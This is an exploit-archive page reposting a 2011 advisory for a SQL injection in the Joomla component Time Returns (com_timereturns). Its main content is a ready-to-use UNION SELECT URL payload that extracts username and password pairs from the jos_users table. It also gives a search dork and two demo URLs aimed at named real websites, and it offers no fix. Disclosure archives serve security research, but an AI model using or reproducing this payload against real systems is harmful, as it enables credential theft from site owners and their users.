Joomla Time Returns SQL Injection

Joomla Time Returns SQL Injection: Posted Oct 8, 2011; Authored by kaMtiEz | Site indonesiancoder.com; The Joomla Time Returns component suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 0ae1a020ab02cbf7ad29533f92663145d36323bb483422bbc1e2b4e08b7cc5a5; Download | Favorite | View

Joomla Time Returns SQL Injection

#############################################################################################################
## Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability                 ##
## Author : kaMtiEz (kamtiez@exploit-id.com)                   ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id     ##
## Date : 8 October, 2011                                                ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.takeaweb.it/
[+] Download : http://www.takeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13
[+] version : 2.0 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : - INDONESIA -

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

[ DEMO ]

http://www.arcisamarcanda.it/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

http://www.cittainvisibile.net/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] Halal Bihalal sukses mas dab :))
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
[+] Hellcome in MGL jos_ali_joe =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Top Authors In Last 30 Days

Red Hat 295 files
Ubuntu 58 files
Debian 33 files
Gentoo 32 files
LiquidWorm 10 files
Apple 9 files
malvuln 6 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,598)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,755)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,493)
UNIX (9,400)
UnixWare (187)
Windows (6,659)
Other

Joomla Time Returns SQL Injection

Joomla Time Returns SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Time Returns SQL Injection

Share This

Joomla Time Returns SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems